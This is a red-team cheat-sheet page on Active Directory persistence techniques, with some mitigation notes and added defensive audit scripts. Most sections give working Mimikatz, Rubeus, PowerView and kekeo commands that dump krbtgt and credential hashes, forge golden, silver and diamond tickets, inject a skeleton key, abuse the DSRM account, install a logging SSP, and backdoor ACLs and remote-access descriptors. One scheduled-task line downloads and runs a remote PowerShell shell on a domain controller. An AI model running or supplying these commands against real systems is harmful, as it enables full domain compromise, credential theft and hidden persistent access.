
Persistence


Last updated 2 months ago

Tool - SharPersist

Install Chrome Extension For Persistence

AD DS Persistence

Insomnihack 2024

Or in French - LeHack 2023:

Golden Tickets

The krbtgt hash (or AES key) can be used to forge a TGT for any user in the domain.

It is recommended to change the password of the krbtgt account twice, because the previous password is kept in the account's password history and tickets signed with it remain valid until the second reset.

Mimikatz on DC to get krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

DCSync (no code execution on the target DC) to get krbtgt hash

SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

The krbtgt hash can also be dumped from NTDS.dit

Create golden ticket

Using the AES256 key rather than the RC4/NTLM hash makes the attack quieter: an RC4-encrypted TGT stands out in a domain where AES is the norm

From any domain-joined machine that can reach the DC

Mimikatz

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

BetterSafetyKatz

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Rubeus

Rubeus.exe golden /aes256:<krbtgt_aes256_key> /sid:<domain_sid> /ldap /user:Administrator /printcmd

Mitigation

The following security control should be implemented to mitigate a Golden Ticket:

  • Change the KRBTGT password every 12 months, or when the domain has been compromised or suspected to have been compromised. Changing the KRBTGT password will invalidate any existing Golden Tickets that are being used.

Silver Tickets

Whereas golden tickets are forged TGTs, silver tickets are forged service tickets (TGS), encrypted and signed with the hash of the service account (a golden ticket is signed with the krbtgt hash). No DC is contacted when the forged TGS is used, so the DC logs nothing for it.

Ex 1 : Access to file system on the DC

Using the AES key is quieter than RC4

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Can be used for other service classes: HOST, RPCSS, HTTP, etc.

Ex: HTTP With Rubeus

Rubeus.exe silver /service:http/dc.domain.local /rc4:<rc4_key_service_account> /sid:<domain_sid> /ldap /user:Administrator /domain:domain.local /ptt

Ex 2 : Achieve command execution using silver ticket

A ticket for the HOST SPN allows us to schedule a task on the target

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Schedule and execute a task

schtasks /create /S dc.domain.local /SC weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c \"iex (New-Object Net.WebClient).DownloadString('http://IP/Invoke-PowershellTcp.ps1')\""

schtasks /Run /S dc.domain.local /TN "STCheck"

Mitigation

The following security controls should be implemented to mitigate a Silver Ticket:

  • Change all computer object (including Domain Controller) passwords every 30 days. Malicious actors can establish persistence in Active Directory using a computer object’s password; ensuring all computer object passwords (including Domain Controller passwords) are changed every 30 days can mitigate this persistence technique.

  • Ensure computer objects are not members of privileged security groups, such as the Domain Admins security group. If malicious actors obtain a computer object’s password hash, then they gain any privileges the computer object has in the domain.

  • Ensure the Domain Computers security group does not have write or modify permissions to any objects in Active Directory. All computer objects are members of the Domain Computers security group. If this security group has rights over other objects, then malicious actors can use these rights to compromise other objects and potentially escalate their privileges and perform lateral movement.
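The account-hygiene controls listed under the Golden and Silver Ticket mitigations can be audited with the script below. It is an added example, not code from the original page; it assumes the ActiveDirectory RSAT module and read access to the domain, and uses the page's thresholds (krbtgt rotated within 12 months, computer passwords within 30 days).

```powershell
# Added example (not from the original page): audit the controls listed under the
# Golden and Silver Ticket mitigations. Requires the ActiveDirectory module.
Import-Module ActiveDirectory

function Get-TicketPersistenceHygiene {
    [CmdletBinding()]
    param(
        [int]$KrbtgtMaxAgeDays   = 365,   # page: change KRBTGT every 12 months
        [int]$ComputerMaxAgeDays = 30     # page: rotate computer passwords every 30 days
    )

    $now      = Get-Date
    $findings = New-Object System.Collections.Generic.List[object]

    # 1. krbtgt password age. An old krbtgt key keeps every previously forged
    #    Golden Ticket valid, and a single reset is not enough (password history).
    $krbtgt    = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
    $krbAge    = ($now - $krbtgt.PasswordLastSet).Days
    $krbStatus = if ($krbAge -gt $KrbtgtMaxAgeDays) { 'FAIL' } else { 'OK' }
    $findings.Add([pscustomobject]@{
        Check  = 'krbtgt password age'
        Object = 'krbtgt'
        Detail = "$krbAge days (limit $KrbtgtMaxAgeDays)"
        Status = $krbStatus
    })

    # 2. Computer accounts whose password has not rotated. A stale machine
    #    account hash lets a forged Silver Ticket for that host stay valid.
    $staleCutoff = $now.AddDays(-$ComputerMaxAgeDays)
    Get-ADComputer -Filter { Enabled -eq $true } -Properties PasswordLastSet |
        Where-Object { $_.PasswordLastSet -lt $staleCutoff } |
        ForEach-Object {
            $findings.Add([pscustomobject]@{
                Check  = 'stale computer password'
                Object = $_.Name
                Detail = "last set $($_.PasswordLastSet)"
                Status = 'FAIL'
            })
        }

    # 3. Computer objects nested in privileged groups. The hash of such a
    #    machine account inherits the group's rights in the domain.
    $privileged = 'Domain Admins', 'Enterprise Admins', 'Administrators',
                  'Account Operators', 'Backup Operators', 'Server Operators', 'Print Operators'
    foreach ($group in $privileged) {
        # Enterprise Admins only exists in the forest root, hence SilentlyContinue.
        Get-ADGroupMember -Identity $group -Recursive -ErrorAction SilentlyContinue |
            Where-Object { $_.objectClass -eq 'computer' } |
            ForEach-Object {
                $findings.Add([pscustomobject]@{
                    Check  = 'computer in privileged group'
                    Object = $_.Name
                    Detail = $group
                    Status = 'FAIL'
                })
            }
    }

    # 4. Domain Computers holding write rights on any directory object. This walks
    #    every object's security descriptor, so it is slow on large domains.
    $writeRights = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty'
    Get-ADObject -Filter * -SearchScope Subtree -Properties nTSecurityDescriptor |
        ForEach-Object {
            $obj = $_
            $obj.nTSecurityDescriptor.Access |
                Where-Object {
                    $_.AccessControlType -eq 'Allow' -and
                    $_.IdentityReference -match 'Domain Computers$' -and
                    (($_.ActiveDirectoryRights -band $writeRights) -ne 0)
                } |
                ForEach-Object {
                    $findings.Add([pscustomobject]@{
                        Check  = 'Domain Computers write right'
                        Object = $obj.DistinguishedName
                        Detail = $_.ActiveDirectoryRights
                        Status = 'FAIL'
                    })
                }
        }

    return $findings
}

Get-TicketPersistenceHygiene | Format-Table -AutoSize
```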

Diamond Tickets

Decrypt a valid TGT with the krbtgt key, modify it (user, groups, etc.) and re-encrypt it with the same key

Harder to detect than a golden ticket, because the forged ticket is derived from a TGT the DC legitimately issued (a matching AS-REQ exists in the logs)

Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /user:target_username /password:target_password /enctype:aes /ticketuser:administrator /domain:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Use the /tgtdeleg option in place of credentials when already running in the context of a domain user

Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /tgtdeleg /enctype:aes /ticketuser:administrator /domain:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Skeleton Key

Patch a DC (lsass process) so that it allows access as any user with a single password

Skeleton Key is not opsec safe and is known to cause issues with AD CS

Inject a skeleton key (password is mimikatz) on a DC.

DA privileges required

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.domain.local

Now any domain account can authenticate to any domain resource with the skeleton password "mimikatz" (the real password keeps working too)

Enter-PSSession -Computername dc -Credential domain\Administrator

If lsass is running as a protected process (RunAsPPL), the mimidrv.sys driver must be on the disk of the target DC to remove the protection first

Very noisy in logs: loading the driver installs a kernel-mode driver service (System log event 7045)

mimikatz# privilege::debug
mimikatz# !+
mimikatz# !processprotect /process:lsass.exe /remove
mimikatz# misc::skeleton
mimikatz# !-

Modify the default key

For example, to use "S3c3rtP@ss", compute its NTLM (RC4) hash and split the 16-byte hash into four 8-hex-character chunks:

56aa742a
6bebb9ca
62fc9f70
a2e00cd3

Reverse the byte order of each chunk (swap in 2-hex-digit pairs, i.e. little-endian DWORDs)

2a74aa56
cab9eb6b
709ffc62
d30ce0a2

Prepend 0x to each value and replace the kiwiKey array in the mimikatz source linked in the references (kuhl_m_misc.c)

DWORD kiwiKey[] = {0x2a74aa56, 0xcab9eb6b, 0x709ffc62, 0xd30ce0a2};

Mitigation

The following security controls should be implemented to mitigate Skeleton Key:

  • Limit access to Domain Controllers to only privileged users that require access. This reduces the number of opportunities for malicious actors to gain access to Domain Controllers.

  • Run the LSASS process in protected mode. This makes it more difficult to override the LSASS process, which is required for Skeleton Key to succeed.

  • Only use Domain Controllers for AD DS and do not install any non-security-related services or applications. This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller.

  • Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity. Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain.

  • Disable the Print Spooler service on Domain Controllers. For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to authenticate to a system they control to collect the Domain Controllers computer object password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access.

DSRM - Directory Services Restore Mode

Every DC has a local "Administrator" account whose password is the DSRM password. It is set when the server is promoted to a DC and is rarely changed afterwards

Dump DSRM password - DA privileges needed

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc

Compare that Administrator hash with the domain Administrator hash returned by the command below; they differ, the first one is the DSRM account

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dc

The logon behavior for the DSRM account must be changed before passing the hash (DsrmAdminLogonBehavior = 2 allows the DSRM account to log on over the network)

Enter-PSSession -Computername dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

or

Invoke-Command -ComputerName dc -ScriptBlock {
    New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
}

Pass the hash

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc.domain.local /user:Administrator /ntlm:<dsrm_hash> /run:powershell.exe"'

ls \\dc\C$

To use PSRemoting, we must force NTLM authentication:

Enter-PSSession -ComputerName dc -Authentication Negotiate

Custom SSP

Security Support Provider is a DLL which provides ways for an application to obtain an authenticated session. Ex: NTLM, Kerberos, Wdigest, CredSSP

Mimikatz mimilib.dll is a custom SSP that logs local logons, service account and machine account passwords in clear text on the target server

All local logons on the DC are logged to C:\Windows\system32\mimilsa.log or C:\Windows\system32\kiwissp.log

Way 1

Drop mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

Way 2

Inject into lsass

Not stable with Server 2019 and Server 2022

Invoke-Mimikatz -Command '"misc::memssp"'
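The Skeleton Key mitigation (LSA protection), the DSRM logon behavior and the Custom SSP registry keys above can all be checked from one place. This is an added example, not code from the original page; the list of default security packages is an assumption that should be adjusted to the Windows build in use.

```powershell
# Added example (not from the original page): read the LSA-related registry values
# touched by the Skeleton Key, DSRM and Custom SSP sections and flag deviations.
# Run on a Domain Controller as local admin, or pass -ComputerName for PS remoting.
function Get-DcLsaPersistenceIndicators {
    [CmdletBinding()]
    param([string]$ComputerName = $env:COMPUTERNAME)

    $script = {
        $lsa      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
        $osconfig = "$lsa\OSConfig"
        $findings = @()

        # Skeleton Key must patch LSASS. RunAsPPL=1 (LSA protection) forces the
        # attacker to load a kernel driver first, which leaves a service-install event.
        $ppl = (Get-ItemProperty -Path $lsa -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
        $findings += [pscustomobject]@{
            Check  = 'LSA protection (RunAsPPL)'
            Value  = if ($null -eq $ppl) { '<not set>' } else { $ppl }
            Status = if ($ppl -eq 1 -or $ppl -eq 2) { 'OK' } else { 'FAIL' }
        }

        # DSRM account: DsrmAdminLogonBehavior should be absent or 0. Value 2 allows
        # network logon with the DSRM hash, which is the state the attack needs.
        $dsrm = (Get-ItemProperty -Path $lsa -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
        $findings += [pscustomobject]@{
            Check  = 'DsrmAdminLogonBehavior'
            Value  = if ($null -eq $dsrm) { '<not set>' } else { $dsrm }
            Status = if ($null -eq $dsrm -or $dsrm -eq 0) { 'OK' } else { 'FAIL' }
        }

        # Custom SSP: any package beyond the Windows defaults in either key is suspect.
        # Assumption: default list for Server 2016+; verify against a known-good DC.
        $defaultPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap', '""')
        foreach ($key in $lsa, $osconfig) {
            $packages = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
            $extra = @($packages | Where-Object { $_ -and ($_ -notin $defaultPackages) })
            $findings += [pscustomobject]@{
                Check  = "Security Packages ($key)"
                Value  = ($packages -join ', ')
                Status = if ($extra.Count -gt 0) { "FAIL: $($extra -join ', ')" } else { 'OK' }
            }
        }

        # The mimilib SSP writes captured logons to these files (see Custom SSP above).
        foreach ($log in 'mimilsa.log', 'kiwissp.log') {
            $path = Join-Path $env:SystemRoot "System32\$log"
            $findings += [pscustomobject]@{
                Check  = "SSP log file $log"
                Value  = $path
                Status = if (Test-Path $path) { 'FAIL: present' } else { 'OK' }
            }
        }
        $findings
    }

    if ($ComputerName -eq $env:COMPUTERNAME) { & $script }
    else { Invoke-Command -ComputerName $ComputerName -ScriptBlock $script }
}

Get-DcLsaPersistenceIndicators | Format-Table -AutoSize
```

A FAIL on RunAsPPL is also what makes the `misc::memssp` injection above possible without a driver.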

AdminSDHolder

Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL

Well Known abuse of Protected Groups

Protected Group / Abuse

  • Account Operators: can modify DA/EA/BA groups; can modify nested groups within these groups
  • Backup Operators: back up a GPO, edit it to add the SID of a controlled account to a privileged group, then restore it
  • Server Operators: run a command as SYSTEM (using the disabled Browser service)
  • Print Operators: copy an ntds.dit backup, load device drivers

Add FullPermissions to a user

With DA privileges, AdminSDHolder can be used as a backdoor/persistence mechanism by granting a user Full Permissions on the AdminSDHolder object; SDProp then copies that ACE onto every protected group and member within the hour

With PowerView

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

Set-DCPermissions -Method AdminSDHolder -SAMAccountName username -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -Verbose

Other permissions: ResetPassword, WriteMembers

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights ResetPassword -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights WriteMembers -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

Run SDProp manually

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

For pre-Server 2008:

Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

Check Domain Admins permission

PowerView

Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier); $_} | ?{$_.IdentityName -match "username"}

AD Module

(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=domain,DC=local').Access | ?{$_.IdentityReference -match 'username'}

Exploit

FullControl

PowerView

Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

AD Module

Add-ADGroupMember -Identity 'Domain Admins' -Members testda

ResetPassword

PowerView

Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

AD Module

Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Rights Abuse

With DA privs, the ACL for the domain root can be modified to provide rights like FullControl or the ability to run DCSync

FullControl

Add FullControl rights:

With PowerView

Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

https://github.com/samratashok/RACE

Set-ADCL -SAMAccountName username -Right GenericAll -DistinguishedName 'DC=domain,DC=local' -Verbose

DCSync

Add rights for DCSync:

With PowerView

Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights DCSync -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

https://github.com/samratashok/RACE

Set-ADCL -SAMAccountName username -GUIDRight DCSync -DistinguishedName 'DC=domain,DC=local' -Verbose

Execute DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"
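The AdminSDHolder and domain-root ACEs added in the two sections above are exactly what a defender should enumerate. The script below is an added example, not code from the original page; it assumes the ActiveDirectory module, and its allow-list of default SIDs is an assumption to extend with accounts that legitimately replicate (Azure AD Connect, for instance).

```powershell
# Added example (not from the original page): list ACEs on AdminSDHolder and the
# domain root that grant control rights or replication (DCSync) rights to a
# principal other than the built-ins that hold them by default.
Import-Module ActiveDirectory

# Extended-right GUIDs that together allow DCSync (what -Rights DCSync grants).
$DcSyncGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-SuspiciousDomainAce {
    [CmdletBinding()]
    param()

    $domain   = Get-ADDomain
    $domainDn = $domain.DistinguishedName
    $domSid   = $domain.DomainSID.Value

    # Principals expected to hold these rights (assumption: extend for your forest).
    $expectedSids = @(
        'S-1-5-18',          # SYSTEM
        'S-1-5-9',           # Enterprise Domain Controllers
        'S-1-5-32-544',      # BUILTIN\Administrators
        "$domSid-512",       # Domain Admins
        "$domSid-516",       # Domain Controllers
        "$domSid-519",       # Enterprise Admins (forest root)
        "$domSid-521"        # Read-only Domain Controllers
    )

    $controlRights = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, WriteDacl, WriteOwner'
    $extendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $targets = @("CN=AdminSDHolder,CN=System,$domainDn", $domainDn)

    foreach ($dn in $targets) {
        $acl = Get-Acl -Path "AD:\$dn"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }

            # Resolve the trustee to a SID so the comparison does not depend on names.
            $sid = try { $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
                   catch { $ace.IdentityReference.Value }
            if ($sid -in $expectedSids) { continue }

            $reason = $null
            if (($ace.ActiveDirectoryRights -band $controlRights) -ne 0) {
                $reason = "control right: $($ace.ActiveDirectoryRights)"
            }
            elseif (($ace.ActiveDirectoryRights -band $extendedRight) -ne 0) {
                $guid = $ace.ObjectType.ToString()
                # An all-zero ObjectType means "every extended right", replication included.
                if ($guid -eq '00000000-0000-0000-0000-000000000000') { $reason = 'all extended rights' }
                elseif ($DcSyncGuids.ContainsKey($guid))              { $reason = $DcSyncGuids[$guid] }
            }
            if ($reason) {
                [pscustomobject]@{
                    Object    = $dn
                    Trustee   = $ace.IdentityReference.Value
                    Inherited = $ace.IsInherited
                    Reason    = $reason
                }
            }
        }
    }
}

Get-SuspiciousDomainAce | Format-Table -AutoSize
```

Inherited ACEs on the domain root are normal; a non-inherited ACE on AdminSDHolder for an ordinary user is the pattern the "Add FullPermissions to a user" section produces.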

Security Descriptors

Modify Security Descriptors of multiple remote access methods to allow access to non-admin users. Admin privs are required

WMI

On local machine for user1

Set-RemoteWMI -SamAccountName user1 -Verbose

On remote machine for user1 without explicit credentials

Set-RemoteWMI -SamAccountName user1 -ComputerName dc -namespace 'root\cimv2' -Verbose

On remote machine with explicit credentials

Set-RemoteWMI -SamAccountName user1 -ComputerName dc -Credential Administrator -namespace 'root\cimv2' -Verbose

On remote machine remove permissions

Set-RemoteWMI -SamAccountName user1 -ComputerName dc -namespace 'root\cimv2' -Remove -Verbose

PS Remoting backdoor

Not stable after August 2020 patches

On local machine for user1

Set-RemotePSRemoting -SamAccountName user1 -Verbose

On remote machine for user1 without explicit credentials

Set-RemotePSRemoting -SamAccountName user1 -ComputerName dc -Verbose

On remote machine, remove permissions

Set-RemotePSRemoting -SamAccountName user1 -ComputerName dc -Remove

Remote Registry

With DAMP

Add-RemoteRegBackdoor -ComputerName dc -Trustee user1 -Verbose

As user1, retrieve machine account hash

Get-RemoteMachineAccountHash -ComputerName dc -Verbose

Retrieve local account hash

Get-RemoteLocalAccountHash -ComputerName dc -Verbose

Retrieve domain cached credentials

Get-RemoteCachedCredential -ComputerName dc -Verbose
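The three remote-access paths backdoored in this section (WMI namespace DACL, PS Remoting endpoint SDDL, Remote Registry winreg key) can be enumerated for unexpected trustees. This is an added example, not code from the original page or from RACE/DAMP; it runs locally as an administrator and its list of expected trustees is an assumption to adjust per host.

```powershell
# Added example (not from the original page): show who is allowed through WMI,
# PS Remoting and Remote Registry on this host, minus the default admin principals.
function Get-RemoteAccessSdIndicators {
    [CmdletBinding()]
    param([string]$Namespace = 'root/cimv2')

    # Default trustees on these paths; anything else deserves a look.
    # Assumption: extend this for hosts where a management account is intentional.
    $expected = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\LOCAL SERVICE',
                  'NT AUTHORITY\NETWORK SERVICE', 'NT AUTHORITY\Authenticated Users',
                  'BUILTIN\Remote Management Users', 'BUILTIN\Backup Operators',
                  'BUILTIN\Performance Log Users', 'CREATOR OWNER', 'NT AUTHORITY\INTERACTIVE')

    # 1. WMI namespace DACL (what Set-RemoteWMI modifies).
    $sd = (Invoke-CimMethod -Namespace $Namespace -ClassName __SystemSecurity `
            -MethodName GetSecurityDescriptor).Descriptor
    foreach ($ace in $sd.DACL) {
        $trustee = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
        if ($trustee -in $expected) { continue }
        [pscustomobject]@{
            Path    = "WMI $Namespace"
            Trustee = $trustee
            Sid     = $ace.Trustee.SIDString
            Rights  = ('0x{0:x}' -f $ace.AccessMask)
        }
    }

    # 2. PS Remoting endpoint SDDLs (what Set-RemotePSRemoting modifies).
    foreach ($cfg in Get-PSSessionConfiguration) {
        if (-not $cfg.SecurityDescriptorSddl) { continue }
        $csd = New-Object System.Security.AccessControl.CommonSecurityDescriptor($false, $false, $cfg.SecurityDescriptorSddl)
        foreach ($ace in $csd.DiscretionaryAcl) {
            if ($ace.AceQualifier -ne 'AccessAllowed') { continue }
            $sid  = $ace.SecurityIdentifier
            $name = try { $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $sid.Value }
            if ($name -in $expected) { continue }
            [pscustomobject]@{
                Path    = "PSRemoting $($cfg.Name)"
                Trustee = $name
                Sid     = $sid.Value
                Rights  = ('0x{0:x}' -f $ace.AccessMask)
            }
        }
    }

    # 3. Remote Registry gate key (what Add-RemoteRegBackdoor modifies first).
    $winreg = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'
    foreach ($ace in (Get-Acl -Path $winreg).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $name = $ace.IdentityReference.Value
        if ($name -in $expected) { continue }
        [pscustomobject]@{
            Path    = 'Registry winreg'
            Trustee = $name
            Sid     = $(try { $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { '' })
            Rights  = $ace.RegistryRights
        }
    }
}

Get-RemoteAccessSdIndicators | Format-Table -AutoSize
```

A non-admin user appearing on all three paths at once is the footprint the Set-Remote*/Add-RemoteRegBackdoor sequence above leaves.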

msDS-AllowedToDelegateTo

Requires SeEnableDelegationPrivilege on the DC and full rights on the target user, both held by default by Domain Admins and Enterprise Admins

With Powershell

# PowerView

Set-DomainObject -Identity devuser -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject -Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/dc.domain.local"}
# 16777216 = TRUSTED_TO_AUTH_FOR_DELEGATION flag in userAccountControl
Set-DomainObject -Identity devuser -XOR @{"useraccountcontrol"="16777216"}

Get-DomainUser -TrustedToAuth

# AD Module

Set-ADUser -Identity devuser -ServicePrincipalNames @{Add='dev/svc'}
Set-ADUser -Identity devuser -Add @{'msDS-AllowedToDelegateTo' = @('ldap/dc', 'ldap/dc.domain.local')} -Verbose
Set-ADAccountControl -Identity devuser -TrustedToAuthForDelegation $true

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

With Kekeo

kekeo# tgt::ask /user:devuser /domain:domain.local /password:Sup3rPassword!

kekeo# tgs::s4u /tgt:TGT_devuser@domain.local_krbtgt~domain.local@domain.local.kirbi /user:Administrator@domain.local /service:ldap/dc.domain.local

Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@domain.local_ldap~dc.domain.local@domain.local.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

With Rubeus

# Get RC4 hash
Rubeus.exe hash /password:Sup3rPassword! /user:devuser /domain:domain.local

Rubeus.exe s4u /user:devuser /rc4:<rc4_hash> /impersonateuser:administrator /msdsspn:ldap/dc.domain.local /domain:domain.local /ptt

SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Mitigation notes

To effectively change the KRBTGT user object's password hash and invalidate any Golden Tickets, the KRBTGT password must be reset twice. This is because both the new and old KRBTGT passwords are stored by Domain Controllers so that authentication in the domain is not disrupted during a KRBTGT password change. When resetting the KRBTGT password, allow sufficient time between the two resets for the new password to replicate to all Domain Controllers. For more information, see Microsoft's guidance and PowerShell script to assist with resetting the KRBTGT password.

List of SPNs: https://adsecurity.org/?page_id=183

Create User objects with SPNs as group Managed Service Accounts (gMSAs). gMSAs have automatic password rotation, a 120-character password and simplified SPN management. These security features protect the password from being cracked, reducing the likelihood of a successful Silver Ticket. However, if creating user objects with SPNs as gMSAs is not feasible, ensure a minimum 30-character password that is unique, unpredictable and managed is set.

Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration. Domain Controllers are classified as 'Tier 0' assets within Microsoft's 'Enterprise Access Model'.

Implement Microsoft's vulnerable driver blocklist. Restricting known malicious or vulnerable drivers on Domain Controllers makes it more difficult for malicious actors to bypass LSASS protection.

Restrict driver execution to an approved set. Restricting the drivers that can be loaded on Domain Controllers to an approved set hardens them against attempts to bypass LSASS protection. This can be achieved through application control solutions, including Microsoft's Windows Defender Application Control.

With the RACE toolkit: get the machine account hash for a silver ticket attack (see Remote Registry above).

Persistence in Linux

References

  • https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03
  • https://adsecurity.org/?page_id=183
  • https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_misc.c#L611
  • https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-11_Active_directory_v2.5.pdf
  • https://github.com/samratashok/RACE
  • GitHub - mandiant/SharPersist
  • Silently Install Chrome Extension For Persistence - Syntax-Err0r
  • PAC Validation, The 20 Minute Rule and Exceptions (BHUSA 2014 part deux)
  • Golden tickets - The Hacker Recipes
  • Silver & Golden Tickets - hackndo
  • Silver tickets - The Hacker Recipes
  • A Diamond in the Ruff - TrustedSec
  • Skeleton Key Malware Analysis - Secureworks
  • Skeleton key - The Hacker Recipes
  • Diamond tickets - The Hacker Recipes
  • Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM) - Active Directory Security
  • Sneaky Active Directory Persistence #13: DSRM Persistence v2 - Active Directory Security
  • Domain Persistence: DSRM - Hacking Articles
  • Appendix C - Protected Accounts and Groups in Active Directory - Microsoft Learn
